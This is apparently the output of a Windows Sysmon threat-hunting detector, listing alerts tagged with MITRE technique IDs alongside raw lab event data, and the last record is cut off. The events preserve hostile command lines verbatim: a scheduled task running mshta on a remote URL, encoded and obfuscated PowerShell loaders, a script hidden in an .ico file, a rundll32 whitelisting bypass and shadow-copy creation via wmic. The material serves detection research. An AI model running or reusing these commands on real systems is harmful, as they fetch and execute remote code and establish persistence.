2019-07-29 21:11:17.445 + 747F3D96-60F5-5D3F-0000-0010D1CF5500 + 4356 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + C:\Users\IEUser\Downloads\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-0020B5314100 + 0x4131b5 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-60F5-5D3F-0000-0010A7B65500 + 4996 + C:\Windows\System32\control.exe + "C:\Windows\System32\control.exe" "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557681631.183699,2019-05-12T21:20:31.183699+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16511 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:20:01.964 + 365ABB72-55C1-5CD8-0000-0010970D2F00 + 4092 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-502E-5CD8-0000-00102A330700 + 3192 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16390 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:32:58.167 + 365ABB72-208A-5CD8-0000-0010119B2400 + 3560 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16390 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:32:58.167 + 365ABB72-208A-5CD8-0000-0010119B2400 + 3560 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.893033,2019-05-27T05:29:18.893033+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5940 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.852 + 365ABB72-3D6E-5CEB-0000-00102FAAFF00 + 3304 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16390 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:32:58.167 + 365ABB72-208A-5CD8-0000-0010119B2400 + 3560 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558497731.307031,2019-05-22T08:02:11.307031+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 839 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-22 04:02:11.287 + 365ABB72-C9C3-5CE4-0000-00101F422E00 + 2888 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-C32E-5CE4-0000-00205DF00000 + 0xf05d + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-C9C1-5CE4-0000-00100B222E00 + 3156 + C:\Program Files\Internet Explorer\iexplore.exe + "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1600 CREDAT:275470 /prefetch:2 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969968.655114,2019-05-27T19:12:48.655114+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6182 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:47.456 + 365ABB72-FE6F-5CEB-0000-0010D33A0C00 + 3344 + C:\Windows\System32\wbem\WMIC.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443 + 365ABB72-FE6F-5CEB-0000-0010F4370C00 + 3448 + C:\Windows\System32\cmd.exe + cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1564436000.711201,2019-07-30T01:33:20.711201+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4907 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-29 21:33:19.556 + 747F3D96-661E-5D3F-0000-00107F248700 + 3164 + C:\Windows\System32\mshta.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49826 + + false + 151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1558452779.809883,2019-05-21T19:32:59.809883+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR "mshta.exe https://hotelesms.com/Injection.txt" /F ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4129 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:59.729 + 365ABB72-1A2B-5CE4-0000-00102F502201 + 3772 + C:\Windows\System32\schtasks.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Manages scheduled tasks + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\schtasks.exe" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR "mshta.exe https://hotelesms.com/Injection.txt" /F + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9 + 365ABB72-1A29-5CE4-0000-001079F92101 + 2432 + C:\Windows\System32\mshta.exe + "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10154 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 22:52:27.588 + 365ABB72-D1AB-5CC8-0000-0010DB1E4400 + 1372 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-C494-5CC8-0000-0020E4FF0000 + 0xffe4 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-D0E5-5CC8-0000-0010DADF3E00 + 2892 + C:\Windows\System32\cmd.exe + cmd + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line ("c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""") and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10662 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-14 11:53:29.768 + 747F3D96-F639-5D53-0000-0010B0FC2600 + 8180 + C:\Windows\System32\wscript.exe + 5.812.10240.16384 + Microsoft ® Windows Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + "c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-F419-5D53-0000-002026910200 + 0x29126 + 1 + Medium + SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C + 747F3D96-F639-5D53-0000-001092EE2600 + 6000 + C:\Windows\explorer.exe + C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.822932,2019-05-27T05:29:18.822932+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:vdir.name ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5937 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.782 + 365ABB72-3D6E-5CEB-0000-00106FA6FF00 + 1876 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:vdir.name + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkA